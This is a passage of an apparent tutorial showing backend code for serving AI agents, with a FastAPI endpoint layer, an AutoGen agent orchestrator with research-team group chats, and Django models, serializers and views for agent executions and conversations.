async def execute_agent(
    request: AgentRequest,
    background_tasks: BackgroundTasks,
    api_key: str = Depends(get_api_key),
):
    """Execute an agent with the given parameters."""
    logger.info(f"Received request for agent: {request.agent_type}")

    try:
        # For long-running tasks, process in background
        if request.async_execution:
            task_id = agent_orchestrator.generate_task_id()
            background_tasks.add_task(
                agent_orchestrator.execute_agent_task,
                task_id=task_id,
                agent_type=request.agent_type,
                parameters=request.parameters,
                user_id=request.user_id,
            )
            return AgentResponse(
                status="processing",
                task_id=task_id,
                # f-string so the client receives the actual polling URL
                message=f"Agent task started, check status at /api/v1/tasks/{task_id}",
            )

        # For synchronous execution
        result = await agent_orchestrator.execute_agent(
            agent_type=request.agent_type,
            parameters=request.parameters,
            user_id=request.user_id,
        )

        return AgentResponse(
            status="completed",
            result=result,
            message="Agent execution complete",
        )

    except Exception as e:
        logger.error(f"Error executing agent: {str(e)}", exc_info=True)
        raise HTTPException(status_code=500, detail=f"Agent execution failed: {str(e)}")

@app.get("/api/v1/tasks/{task_id}", response_model=AgentResponse)
async def get_task_status(
    task_id: str,
    api_key: str = Depends(get_api_key),
):
    """Get the status of an agent task."""
    try:
        task_status = agent_orchestrator.get_task_status(task_id)

        if not task_status:
            raise HTTPException(status_code=404, detail=f"Task {task_id} not found")

        return task_status

    except HTTPException:
        raise
    except Exception as e:
        logger.error(f"Error retrieving task status: {str(e)}", exc_info=True)
        raise HTTPException(status_code=500, detail=f"Error retrieving task status: {str(e)}")

@app.get("/api/v1/agents/types")
async def get_agent_types(
    api_key: str = Depends(get_api_key),
):
    """Get available agent types and capabilities."""
    return {
        "agent_types": agent_orchestrator.get_available_agent_types(),
    }

# Health check endpoint
@app.get("/health")
async def health_check():
    """Health check endpoint."""
    return {"status": "healthy"}

if __name__ == "__main__":
    uvicorn.run("main:app", host="0.0.0.0", port=8000, reload=settings.debug)
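
The entry point imports `get_api_key` from `agent_system.auth`, a module this section does not show. As a rough, framework-independent sketch of the check such a dependency might perform, the following assumes keys are stored as SHA-256 digests rather than in plain text. The names `hash_key`, `is_valid_api_key`, and `ALLOWED`, as well as the sample key, are hypothetical.

```python
import hashlib
import hmac
from typing import Iterable


def hash_key(raw_key: str) -> str:
    """Return the SHA-256 hex digest of an API key (store this, not the raw key)."""
    return hashlib.sha256(raw_key.encode("utf-8")).hexdigest()


def is_valid_api_key(provided: str, allowed_hashes: Iterable[str]) -> bool:
    """Check a presented key against stored digests."""
    if not provided:
        return False
    provided_hash = hash_key(provided)
    valid = False
    for stored in allowed_hashes:
        # compare_digest runs in constant time, so timing does not reveal
        # how many leading characters matched
        if hmac.compare_digest(provided_hash, stored):
            valid = True
    return valid


ALLOWED = {hash_key("demo-key-123")}  # hypothetical key, for illustration only
print(is_valid_api_key("demo-key-123", ALLOWED))
print(is_valid_api_key("wrong-key", ALLOWED))
```

In a FastAPI application, a dependency could read the key from a request header (for example with `fastapi.security.APIKeyHeader`) and raise `HTTPException(status_code=401)` whenever a check like this returns `False`.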

Agent System Core Structure (FastAPI)

python
# agent_system/core.py
import os
import json
import uuid
import time
import asyncio
import logging
from typing import Any, Callable, Dict, List, Optional

import autogen
from autogen.agentchat.contrib.gpt_assistant_agent import GPTAssistantAgent

from .config import Settings
from .models import AgentTask, AgentResponse

logger = logging.getLogger("agent_orchestrator")

class AgentOrchestrator:
    """Orchestrates AI agents, managing their lifecycle and execution."""

    def __init__(self, settings: Settings):
        """Initialize the agent orchestrator with configuration settings."""
        self.settings = settings
        self.agent_registry = {}  # Maps agent_type to agent factory function
        self.agent_configs = {}  # Maps agent_type to configuration
        self.tasks = {}  # Maps task_id to task status/results

        # Initialize the agent registry
        self._initialize_agent_registry()

    def _initialize_agent_registry(self):
        """Register available agent types with their factory functions."""
        # Register default agent types
        self.register_agent_type(
            "general_assistant",
            self._create_general_assistant,
            {
                "description": "General-purpose assistant for wide-ranging questions",
                "parameters": {
                    "temperature": 0.7,
                    "streaming": True
                }
            }
        )

        self.register_agent_type(
            "code_assistant",
            self._create_code_assistant,
            {
                "description": "Specialized assistant for coding and software development",
                "parameters": {
                    "temperature": 0.2,
                    "streaming": True
                }
            }
        )

        self.register_agent_type(
            "research_team",
            self._create_research_team,
            {
                "description": "Multi-agent team for in-depth research on complex topics",
                "parameters": {
                    "max_research_steps": 10,
                    "depth": "comprehensive",
                    "team_size": 3
                }
            }
        )

        # Load custom agent types from configuration if available
        self._load_custom_agent_types()

    def _load_custom_agent_types(self):
        """Load custom agent types from configuration."""
        custom_agents_path = self.settings.custom_agents_path
        if not custom_agents_path or not os.path.exists(custom_agents_path):
            logger.info("No custom agents configuration found")
            return

        try:
            with open(custom_agents_path, "r") as f:
                custom_agents = json.load(f)

            for agent_type, config in custom_agents.items():
                # Custom agents would need a factory method that interprets the config
                self.register_agent_type(
                    agent_type,
                    self._create_custom_agent,
                    config
                )

            logger.info(f"Loaded {len(custom_agents)} custom agent types")
        except Exception as e:
            logger.error(f"Error loading custom agents: {str(e)}", exc_info=True)

    def register_agent_type(
        self,
        agent_type: str,
        factory_func: Callable[[Dict[str, Any]], Any],
        config: Dict[str, Any],
    ):
        """Register a new agent type with its factory function and configuration."""
        self.agent_registry[agent_type] = factory_func
        self.agent_configs[agent_type] = config
        logger.info(f"Registered agent type: {agent_type}")

    def get_available_agent_types(self) -> List[Dict[str, Any]]:
        """Get a list of available agent types and their configurations."""
        return [
            {"agent_type": agent_type, **config}
            for agent_type, config in self.agent_configs.items()
        ]

    def generate_task_id(self) -> str:
        """Generate a unique task ID."""
        return f"task_{uuid.uuid4().hex}"

    async def execute_agent(
        self,
        agent_type: str,
        parameters: Dict[str, Any],
        user_id: Optional[str] = None,
    ) -> Dict[str, Any]:
        """Execute an agent synchronously and return the result."""
        if agent_type not in self.agent_registry:
            raise ValueError(f"Unknown agent type: {agent_type}")

        # Create agent instance
        agent_factory = self.agent_registry[agent_type]
        agent = agent_factory(parameters)

        # Execute agent
        try:
            result = await agent.execute(parameters)
            return result
        except Exception as e:
            logger.error(f"Error executing agent {agent_type}: {str(e)}", exc_info=True)
            raise

    async def execute_agent_task(
        self,
        task_id: str,
        agent_type: str,
        parameters: Dict[str, Any],
        user_id: Optional[str] = None,
    ):
        """Execute an agent as a background task and store the result."""
        # Initialize task status
        self.tasks[task_id] = AgentTask(
            task_id=task_id,
            agent_type=agent_type,
            status="processing",
            start_time=time.time(),
            parameters=parameters,
            user_id=user_id,
        )

        try:
            # Execute the agent
            result = await self.execute_agent(agent_type, parameters, user_id)

            # Update task with successful result
            self.tasks[task_id].status = "completed"
            self.tasks[task_id].end_time = time.time()
            self.tasks[task_id].result = result

        except Exception as e:
            # Update task with error
            self.tasks[task_id].status = "failed"
            self.tasks[task_id].end_time = time.time()
            self.tasks[task_id].error = str(e)
            logger.error(f"Task {task_id} failed: {str(e)}", exc_info=True)

    def get_task_status(self, task_id: str) -> Optional[AgentResponse]:
        """Get the status of a task by ID."""
        if task_id not in self.tasks:
            return None

        task = self.tasks[task_id]

        if task.status == "completed":
            return AgentResponse(
                status="completed",
                task_id=task_id,
                result=task.result,
                message="Task completed successfully",
                execution_time=task.end_time - task.start_time if task.end_time else None,
            )
        elif task.status == "failed":
            return AgentResponse(
                status="failed",
                task_id=task_id,
                error=task.error,
                message="Task execution failed",
                execution_time=task.end_time - task.start_time if task.end_time else None,
            )
        else:
            return AgentResponse(
                status="processing",
                task_id=task_id,
                message="Task is still processing",
                execution_time=time.time() - task.start_time if task.start_time else None,
            )

    # Agent factory methods

    def _create_general_assistant(self, parameters: Dict[str, Any]):
        """Create a general-purpose assistant agent."""
        temperature = parameters.get("temperature", 0.7)

        return GeneralAssistantAgent(
            name="GeneralAssistant",
            llm_config={
                "config_list": self.settings.get_llm_config_list(),
                "temperature": temperature,
            }
        )

    def _create_code_assistant(self, parameters: Dict[str, Any]):
        """Create a code-specialized assistant agent."""
        temperature = parameters.get("temperature", 0.2)

        return CodeAssistantAgent(
            name="CodeAssistant",
            llm_config={
                "config_list": self.settings.get_llm_config_list(),
                "temperature": temperature,
            }
        )

    def _create_research_team(self, parameters: Dict[str, Any]):
        """Create a multi-agent research team."""
        return ResearchTeamAgentGroup(
            config_list=self.settings.get_llm_config_list(),
            parameters=parameters
        )

    def _create_custom_agent(self, parameters: Dict[str, Any]):
        """Create a custom agent based on configuration."""
        # Implementation would depend on how custom agents are defined
        agent_config = parameters.get("agent_config", {})

        if agent_config.get("type") == "assistant":
            return GeneralAssistantAgent(
                name=agent_config.get("name", "CustomAssistant"),
                llm_config={
                    "config_list": self.settings.get_llm_config_list(),
                    "temperature": agent_config.get("temperature", 0.7),
                }
            )
        elif agent_config.get("type") == "multi_agent":
            # Create a multi-agent system
            return CustomMultiAgentSystem(
                config_list=self.settings.get_llm_config_list(),
                parameters=agent_config
            )
        else:
            raise ValueError(f"Unknown custom agent type: {agent_config.get('type')}")


# Example agent implementations

class GeneralAssistantAgent:
    """General-purpose assistant agent implementation."""

    def __init__(self, name: str, llm_config: Dict[str, Any]):
        self.name = name
        self.llm_config = llm_config
        self.agent = autogen.AssistantAgent(
            name=name,
            system_message="You are a helpful AI assistant that provides informative, accurate, and thoughtful responses.",
            llm_config=llm_config
        )

    async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
        """Execute the agent with the given parameters."""
        user_message = parameters.get("message", "")
        if not user_message:
            raise ValueError("No message provided for the agent")

        user_proxy = autogen.UserProxyAgent(
            name="user_proxy",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=0,
            code_execution_config=False,  # this agent never runs code
        )

        # Start the conversation; the async variant avoids blocking the event loop
        chat_result = await user_proxy.a_initiate_chat(
            self.agent,
            message=user_message
        )
        chat_history = chat_result.chat_history

        # Extract the response. The history is recorded from the user proxy's
        # perspective, so messages received from the assistant carry role "user".
        last_message = None
        for message in reversed(chat_history):
            if message.get("role") == "user" and message.get("content"):
                last_message = message
                break

        if not last_message:
            raise RuntimeError("No response received from agent")

        return {
            "response": last_message["content"],
            "agent_name": self.name,
            "chat_history": chat_history
        }


class CodeAssistantAgent:
    """Code-specialized assistant agent implementation."""

    def __init__(self, name: str, llm_config: Dict[str, Any]):
        self.name = name
        self.llm_config = llm_config
        self.agent = autogen.AssistantAgent(
            name=name,
            system_message="""You are a skilled coding assistant with expertise in software development.
            You provide accurate, efficient, and well-explained code solutions.
            When writing code, focus on best practices, performance, and readability.
            Explain your code so users understand the implementation.""",
            llm_config=llm_config
        )

    async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
        """Execute the agent with the given parameters."""
        user_message = parameters.get("message", "")
        if not user_message:
            raise ValueError("No message provided for the agent")

        # Allow code execution only if specifically enabled
        code_execution = parameters.get("code_execution", False)

        # Pass False (not None) to disable execution: None falls back to the
        # default configuration, which enables it.
        # Note: with max_consecutive_auto_reply=0 the proxy never replies, so it
        # never executes returned code; raise the limit if results should be fed back.
        user_proxy = autogen.UserProxyAgent(
            name="user_proxy",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=0,
            code_execution_config={"work_dir": "coding_workspace"} if code_execution else False
        )

        # Start the conversation; the async variant avoids blocking the event loop
        chat_result = await user_proxy.a_initiate_chat(
            self.agent,
            message=user_message
        )
        chat_history = chat_result.chat_history

        # Extract the response. The history is recorded from the user proxy's
        # perspective, so messages received from the assistant carry role "user".
        last_message = None
        for message in reversed(chat_history):
            if message.get("role") == "user" and message.get("content"):
                last_message = message
                break

        if not last_message:
            raise RuntimeError("No response received from agent")

        return {
            "response": last_message["content"],
            "agent_name": self.name,
            "chat_history": chat_history,
            "code_blocks": self._extract_code_blocks(last_message["content"])
        }

    def _extract_code_blocks(self, text: str) -> List[Dict[str, str]]:
        """Extract code blocks from a markdown text."""
        import re

        code_blocks = []
        pattern = r'```(\w*)\n(.*?)```'
        matches = re.findall(pattern, text, re.DOTALL)

        for language, code in matches:
            code_blocks.append({
                "language": language.strip() or "plaintext",
                "code": code.strip()
            })

        return code_blocks


class ResearchTeamAgentGroup:
    """Multi-agent research team implementation."""

    def __init__(self, config_list: List[Dict[str, Any]], parameters: Dict[str, Any]):
        self.config_list = config_list
        self.parameters = parameters

        # Configure the team size and roles
        self.team_size = parameters.get("team_size", 3)

        # Initialize base LLM config
        self.base_llm_config = {
            "config_list": config_list,
            "temperature": 0.5,
        }

    async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
        """Execute the research team with the given parameters."""
        topic = parameters.get("topic", "")
        if not topic:
            raise ValueError("No research topic provided")

        depth = parameters.get("depth", "comprehensive")
        max_steps = parameters.get("max_research_steps", 10)

        # Create the research team
        researcher = autogen.AssistantAgent(
            name="Researcher",
            system_message="""You are an expert researcher who excels at finding information
            and breaking down complex topics. Your role is to gather relevant information,
            identify key questions, and organize research findings.""",
            llm_config=self.base_llm_config
        )

        analyst = autogen.AssistantAgent(
            name="Analyst",
            system_message="""You are an expert analyst who excels at interpreting information,
            identifying patterns, and drawing insightful conclusions. Your role is to analyze
            the research findings, evaluate evidence, and provide reasoned interpretations.""",
            llm_config=self.base_llm_config
        )

        critic = autogen.AssistantAgent(
            name="Critic",
            system_message="""You are an expert critic who excels at identifying weaknesses,
            biases, and gaps in research and analysis. Your role is to critique the research
            and analysis, point out limitations, and suggest improvements.""",
            llm_config=self.base_llm_config
        )

        # Create user proxy to coordinate the team
        user_proxy = autogen.UserProxyAgent(
            name="ResearchCoordinator",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=max_steps,
            code_execution_config=False,  # the coordinator should not run code
            system_message="""You are coordinating a research project.
            Your role is to guide the research team, track progress, and
            ensure the final output addresses the research topic completely."""
        )

        # Create group chat for the team
        groupchat = autogen.GroupChat(
            agents=[user_proxy, researcher, analyst, critic],
            messages=[],
            max_round=max_steps
        )

        manager = autogen.GroupChatManager(
            groupchat=groupchat,
            llm_config=self.base_llm_config
        )

        # Start the research process
        research_prompt = f"""
        Research Topic: {topic}

        Research Depth: {depth}

        Please conduct a thorough research project on this topic following these steps:

        1. The Researcher should first explore the topic, identify key questions, and gather relevant information.
        2. The Analyst should then interpret the findings, identify patterns, and draw conclusions.
        3. The Critic should evaluate the research and analysis, identify limitations, and suggest improvements.
        4. Iterate on this process until a comprehensive understanding is achieved.
        5. Provide a final research report that includes:
        - Executive Summary
        - Key Findings
        - Analysis and Interpretation
        - Limitations and Gaps
        - Conclusions and Implications
        """

        # Initiate the chat; the async variant avoids blocking the event loop
        await user_proxy.a_initiate_chat(
            manager,
            message=research_prompt
        )

        # Process the results: the group chat keeps every message, tagged with
        # the name of the agent that sent it
        chat_history = groupchat.messages
        team_members = [researcher.name, analyst.name, critic.name]

        # Extract the final research report
        final_report = None
        for message in reversed(chat_history):
            # Look for the last comprehensive message from any team member
            content = message.get("content") or ""
            if message.get("name") in team_members and len(content) > 1000:
                final_report = content
                break

        return {
            "topic": topic,
            "depth": depth,
            "report": final_report,
            "chat_history": chat_history,
            "team_members": team_members
        }


class CustomMultiAgentSystem:
    """Custom implementation of a multi-agent system based on configuration."""

    def __init__(self, config_list: List[Dict[str, Any]], parameters: Dict[str, Any]):
        self.config_list = config_list
        self.parameters = parameters

    async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
        """Execute the custom multi-agent system."""
        # This would be implemented based on the specific requirements
        # of the custom multi-agent system configuration
        raise NotImplementedError("Custom multi-agent systems are not yet implemented")
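
The orchestrator above combines two patterns: a registry that maps an agent type to a factory, and an in-memory task table that background executions update. The sketch below isolates those two patterns using only the standard library. `TaskRecord`, `EchoAgent`, and `MiniOrchestrator` are hypothetical stand-ins (no LLM is called), so treat it as an illustration of the control flow rather than a drop-in replacement.

```python
import asyncio
import time
import uuid
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, Optional


@dataclass
class TaskRecord:
    """In-memory status record, standing in for AgentTask."""
    task_id: str
    status: str = "processing"
    start_time: float = field(default_factory=time.time)
    result: Optional[Dict[str, Any]] = None
    error: Optional[str] = None


class EchoAgent:
    """Stub agent; a real one would call an LLM here."""

    async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
        if "message" not in parameters:
            raise ValueError("No message provided for the agent")
        await asyncio.sleep(0)  # yield control, as a real network call would
        return {"response": parameters["message"].upper()}


class MiniOrchestrator:
    def __init__(self) -> None:
        self.registry: Dict[str, Callable[[Dict[str, Any]], Any]] = {}
        self.tasks: Dict[str, TaskRecord] = {}

    def register(self, agent_type: str, factory: Callable[[Dict[str, Any]], Any]) -> None:
        self.registry[agent_type] = factory

    async def run_task(self, task_id: str, agent_type: str, parameters: Dict[str, Any]) -> None:
        # Record the task first so a status lookup never misses it
        record = self.tasks[task_id] = TaskRecord(task_id)
        try:
            agent = self.registry[agent_type](parameters)
            record.result = await agent.execute(parameters)
            record.status = "completed"
        except Exception as exc:
            record.error = str(exc)
            record.status = "failed"


async def demo():
    orch = MiniOrchestrator()
    orch.register("echo", lambda params: EchoAgent())
    ok_id = f"task_{uuid.uuid4().hex}"
    bad_id = f"task_{uuid.uuid4().hex}"
    # Both tasks run concurrently; a failure in one does not affect the other
    await asyncio.gather(
        orch.run_task(ok_id, "echo", {"message": "hello"}),
        orch.run_task(bad_id, "echo", {}),
    )
    return orch.tasks[ok_id], orch.tasks[bad_id]


ok, bad = asyncio.run(demo())
print(ok.status, ok.result)
print(bad.status, bad.error)
```

Because the task table lives in process memory, status is lost on restart and is not shared between worker processes; a deployment with several replicas would likely need an external store such as Redis or a database.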

Django Backend for AI Agents

Django offers a more structured approach with built-in admin interfaces, ORM, and a comprehensive framework for building complex applications.

python
# models.py
from django.db import models
from django.contrib.auth.models import User
import uuid
import json

class AgentType(models.Model):
    """Model representing different types of AI agents available in the system."""
    name = models.CharField(max_length=100, unique=True)
    description = models.TextField()
    parameters_schema = models.JSONField(default=dict)
    is_active = models.BooleanField(default=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self):
        return self.name

class AgentExecution(models.Model):
    """Model for tracking agent execution jobs."""
    STATUS_CHOICES = (
        ('pending', 'Pending'),
        ('running', 'Running'),
        ('completed', 'Completed'),
        ('failed', 'Failed'),
        ('canceled', 'Canceled'),
    )

    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_executions')
    agent_type = models.ForeignKey(AgentType, on_delete=models.CASCADE)

    status = models.CharField(max_length=20, choices=STATUS_CHOICES, default='pending')
    parameters = models.JSONField(default=dict)
    result = models.JSONField(null=True, blank=True)
    error_message = models.TextField(null=True, blank=True)

    created_at = models.DateTimeField(auto_now_add=True)
    started_at = models.DateTimeField(null=True, blank=True)
    completed_at = models.DateTimeField(null=True, blank=True)

    priority = models.IntegerField(default=0)
    celery_task_id = models.CharField(max_length=255, null=True, blank=True)

    # Performance metrics
    execution_time = models.FloatField(null=True, blank=True)
    tokens_used = models.IntegerField(null=True, blank=True)

    class Meta:
        ordering = ['-created_at']
        indexes = [
            models.Index(fields=['user', 'status']),
            models.Index(fields=['agent_type', 'status']),
        ]

    def __str__(self):
        return f"{self.agent_type} execution by {self.user.username} ({self.status})"

class AgentFeedback(models.Model):
    """Model for storing user feedback on agent executions."""
    RATING_CHOICES = (
        (1, '1 - Poor'),
        (2, '2 - Fair'),
        (3, '3 - Good'),
        (4, '4 - Very Good'),
        (5, '5 - Excellent'),
    )

    execution = models.ForeignKey(AgentExecution, on_delete=models.CASCADE, related_name='feedback')
    user = models.ForeignKey(User, on_delete=models.CASCADE)

    rating = models.IntegerField(choices=RATING_CHOICES)
    comments = models.TextField(null=True, blank=True)
    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        unique_together = ('execution', 'user')
        ordering = ['-created_at']

    def __str__(self):
        return f"Feedback on {self.execution} by {self.user.username}"

class AgentConversation(models.Model):
    """Model for persistent conversations with agents."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_conversations')
    agent_type = models.ForeignKey(AgentType, on_delete=models.CASCADE)

    title = models.CharField(max_length=255)
    is_active = models.BooleanField(default=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    metadata = models.JSONField(default=dict, blank=True)

    class Meta:
        ordering = ['-updated_at']

    def __str__(self):
        return f"{self.title} ({self.agent_type})"

class ConversationMessage(models.Model):
    """Model for messages within a conversation."""
    MESSAGE_ROLE_CHOICES = (
        ('user', 'User'),
        ('assistant', 'Assistant'),
        ('system', 'System'),
    )

    conversation = models.ForeignKey(AgentConversation, on_delete=models.CASCADE, related_name='messages')
    role = models.CharField(max_length=10, choices=MESSAGE_ROLE_CHOICES)
    content = models.TextField()

    created_at = models.DateTimeField(auto_now_add=True)
    tokens = models.IntegerField(default=0)

    metadata = models.JSONField(default=dict, blank=True)

    class Meta:
        ordering = ['created_at']

    def __str__(self):
        return f"{self.role} message in {self.conversation}"
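
The `STATUS_CHOICES` on `AgentExecution` imply a lifecycle, but the model itself does not enforce which status changes are legal. One way to make that explicit is a small transition table, sketched below in plain Python. The table and the helpers `can_transition` and `transition` are assumptions for illustration; they are not part of the models above.

```python
from typing import Dict, FrozenSet

# Allowed moves between the STATUS_CHOICES values of AgentExecution.
# This table is an assumption for illustration; the models do not enforce it.
ALLOWED_TRANSITIONS: Dict[str, FrozenSet[str]] = {
    "pending": frozenset({"running", "canceled"}),
    "running": frozenset({"completed", "failed", "canceled"}),
    "completed": frozenset(),  # terminal
    "failed": frozenset(),     # terminal
    "canceled": frozenset(),   # terminal
}


def can_transition(current: str, new: str) -> bool:
    """Return True if moving from `current` to `new` is allowed."""
    return new in ALLOWED_TRANSITIONS.get(current, frozenset())


def transition(current: str, new: str) -> str:
    """Return the new status, or raise if the change is not allowed."""
    if not can_transition(current, new):
        raise ValueError(f"Illegal status change: {current} -> {new}")
    return new


status = transition("pending", "running")
status = transition(status, "completed")
print(status)
print(can_transition("completed", "canceled"))
```

A check like this could sit in a model method or in the Celery task that updates the record, so that a late worker update cannot overwrite a status that is already terminal.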
python
# serializers.py
from rest_framework import serializers
from .models import AgentType, AgentExecution, AgentFeedback, AgentConversation, ConversationMessage
from django.contrib.auth.models import User

class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = ['id', 'username', 'email', 'first_name', 'last_name']
        read_only_fields = fields

class AgentTypeSerializer(serializers.ModelSerializer):
    class Meta:
        model = AgentType
        fields = ['id', 'name', 'description', 'parameters_schema', 'is_active']
        read_only_fields = ['id', 'created_at', 'updated_at']

class AgentExecutionSerializer(serializers.ModelSerializer):
    user = UserSerializer(read_only=True)
    agent_type = AgentTypeSerializer(read_only=True)
    agent_type_id = serializers.PrimaryKeyRelatedField(
        queryset=AgentType.objects.all(),
        write_only=True,
        source='agent_type'
    )

    class Meta:
        model = AgentExecution
        fields = [
            'id', 'user', 'agent_type', 'agent_type_id', 'status',
            'parameters', 'result', 'error_message', 'created_at',
            'started_at', 'completed_at', 'execution_time', 'tokens_used',
            'priority', 'celery_task_id'
        ]
        read_only_fields = [
            'id', 'user', 'status', 'result', 'error_message', 'created_at',
            'started_at', 'completed_at', 'execution_time', 'tokens_used',
            'celery_task_id'
        ]

    def create(self, validated_data):
        # Set the user from the request
        user = self.context['request'].user
        validated_data['user'] = user
        return super().create(validated_data)

class AgentFeedbackSerializer(serializers.ModelSerializer):
    user = UserSerializer(read_only=True)

    class Meta:
        model = AgentFeedback
        fields = ['id', 'execution', 'user', 'rating', 'comments', 'created_at']
        read_only_fields = ['id', 'user', 'created_at']

    def create(self, validated_data):
        # Set the user from the request
        user = self.context['request'].user
        validated_data['user'] = user
        return super().create(validated_data)

class ConversationMessageSerializer(serializers.ModelSerializer):
    class Meta:
        model = ConversationMessage
        fields = ['id', 'conversation', 'role', 'content', 'created_at', 'tokens', 'metadata']
        read_only_fields = ['id', 'created_at', 'tokens']

class AgentConversationSerializer(serializers.ModelSerializer):
    user = UserSerializer(read_only=True)
    agent_type = AgentTypeSerializer(read_only=True)
    agent_type_id = serializers.PrimaryKeyRelatedField(
        queryset=AgentType.objects.all(),
        write_only=True,
        source='agent_type'
    )
    messages = ConversationMessageSerializer(many=True, read_only=True)

    class Meta:
        model = AgentConversation
        fields = [
            'id', 'user', 'agent_type', 'agent_type_id', 'title',
            'is_active', 'created_at', 'updated_at', 'metadata', 'messages'
        ]
        read_only_fields = ['id', 'user', 'created_at', 'updated_at']

    def create(self, validated_data):
        # Set the user from the request
        user = self.context['request'].user
        validated_data['user'] = user
        return super().create(validated_data)

class MessageCreateSerializer(serializers.Serializer):
    """Serializer for creating a new message and getting agent response."""
    conversation_id = serializers.UUIDField()
    content = serializers.CharField()
    metadata = serializers.JSONField(required=False)

    def validate_conversation_id(self, value):
        try:
            conversation = AgentConversation.objects.get(id=value)
            if conversation.user != self.context['request'].user:
                raise serializers.ValidationError("Conversation does not belong to the current user")
            return value
        except AgentConversation.DoesNotExist:
            raise serializers.ValidationError("Conversation does not exist")
python
1# views.py
2from rest_framework import viewsets, status, permissions
3from rest_framework.decorators import action
4from rest_framework.response import Response
5from django.utils import timezone
6from django.db import transaction
7from django_celery_results.models import TaskResult
8
9from .models import AgentType, AgentExecution, AgentFeedback, AgentConversation, ConversationMessage
10from .serializers import (
11 AgentTypeSerializer, AgentExecutionSerializer, AgentFeedbackSerializer,
12 AgentConversationSerializer, ConversationMessageSerializer, MessageCreateSerializer
13)
14from .tasks import execute_agent_task, process_agent_message
15from .agents import get_agent_registry
16
17class AgentTypeViewSet(viewsets.ReadOnlyModelViewSet):
18 """ViewSet for listing available agent types."""
19 queryset = AgentType.objects.filter(is_active=True)
20 serializer_class = AgentTypeSerializer
21 permission_classes = [permissions.IsAuthenticated]
22
23 @action(detail=True, methods=['get'])
24 def parameters_schema(self, request, pk=None):
25 """Get the parameters schema for an agent type."""
26 agent_type = self.get_object()
27 return Response(agent_type.parameters_schema)
28
29class AgentExecutionViewSet(viewsets.ModelViewSet):
30 """ViewSet for managing agent executions."""
31 serializer_class = AgentExecutionSerializer
32 permission_classes = [permissions.IsAuthenticated]
33
34 def get_queryset(self):
35 """Return executions for the current user."""
36 return AgentExecution.objects.filter(user=self.request.user)
37
38 def create(self, request, *args, **kwargs):
39 """Create a new agent execution and queue the task."""
40 serializer = self.get_serializer(data=request.data)
41 serializer.is_valid(raise_exception=True)
42
43 # Create the execution record
44 with transaction.atomic():
45 execution = serializer.save()
46 execution.status = 'pending'
47 execution.save()
48
49 # Queue the task
50 task = execute_agent_task.delay(str(execution.id))
51 execution.celery_task_id = task.id
52 execution.save()
53
54 headers = self.get_success_headers(serializer.data)
55 return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
56
    @action(detail=True, methods=['post'])
    def cancel(self, request, pk=None):
        """Cancel a pending or running execution."""
        execution = self.get_object()

        if execution.status not in ['pending', 'running']:
            return Response(
                {"detail": "Only pending or running executions can be canceled."},
                status=status.HTTP_400_BAD_REQUEST
            )

        # Revoke the Celery task. The celery.task.control module was removed in
        # Celery 5, so the control API is reached through the app instance.
        if execution.celery_task_id:
            from celery import current_app
            current_app.control.revoke(execution.celery_task_id, terminate=True)

        # Update execution status
        execution.status = 'canceled'
        execution.completed_at = timezone.now()
        execution.save()

        serializer = self.get_serializer(execution)
        return Response(serializer.data)

    @action(detail=True, methods=['post'])
    def feedback(self, request, pk=None):
        """Add feedback for an execution."""
        execution = self.get_object()

        # Check if execution is completed
        if execution.status != 'completed':
            return Response(
                {"detail": "Feedback can only be provided for completed executions."},
                status=status.HTTP_400_BAD_REQUEST
            )

        # Create or update feedback
        feedback_data = {
            'execution': execution.id,
            'rating': request.data.get('rating'),
            'comments': request.data.get('comments', '')
        }

        # Check if feedback already exists
        try:
            feedback = AgentFeedback.objects.get(execution=execution, user=request.user)
            feedback_serializer = AgentFeedbackSerializer(
                feedback, data=feedback_data, context={'request': request}
            )
        except AgentFeedback.DoesNotExist:
            feedback_serializer = AgentFeedbackSerializer(
                data=feedback_data, context={'request': request}
            )

        feedback_serializer.is_valid(raise_exception=True)
        feedback_serializer.save()

        return Response(feedback_serializer.data)

class ConversationViewSet(viewsets.ModelViewSet):
    """ViewSet for managing agent conversations."""
    serializer_class = AgentConversationSerializer
    permission_classes = [permissions.IsAuthenticated]

    def get_queryset(self):
        """Return conversations for the current user."""
        return AgentConversation.objects.filter(user=self.request.user)

    @action(detail=True, methods=['post'])
    def send_message(self, request, pk=None):
        """Store a new user message and queue the agent's response."""
        conversation = self.get_object()

        # Ensure conversation is active
        if not conversation.is_active:
            return Response(
                {"detail": "This conversation is no longer active."},
                status=status.HTTP_400_BAD_REQUEST
            )

        # Validate message data
        serializer = MessageCreateSerializer(
            data={'conversation_id': str(conversation.id), **request.data},
            context={'request': request}
        )
        serializer.is_valid(raise_exception=True)

        # Create user message
        content = serializer.validated_data['content']
        metadata = serializer.validated_data.get('metadata', {})

        user_message = ConversationMessage.objects.create(
            conversation=conversation,
            role='user',
            content=content,
            metadata=metadata
        )

        # Update conversation timestamp
        conversation.updated_at = timezone.now()
        conversation.save()

        # Process message asynchronously
        task = process_agent_message.delay(
            conversation_id=str(conversation.id),
            message_id=str(user_message.id)
        )

        # Return the user message and task ID
        return Response({
            'message': ConversationMessageSerializer(user_message).data,
            'task_id': task.id,
            'status': 'processing'
        })

    @action(detail=True, methods=['get'])
    def messages(self, request, pk=None):
        """Get all messages in a conversation."""
        conversation = self.get_object()
        messages = conversation.messages.all()

        # Handle pagination
        page = self.paginate_queryset(messages)
        if page is not None:
            serializer = ConversationMessageSerializer(page, many=True)
            return self.get_paginated_response(serializer.data)

        serializer = ConversationMessageSerializer(messages, many=True)
        return Response(serializer.data)

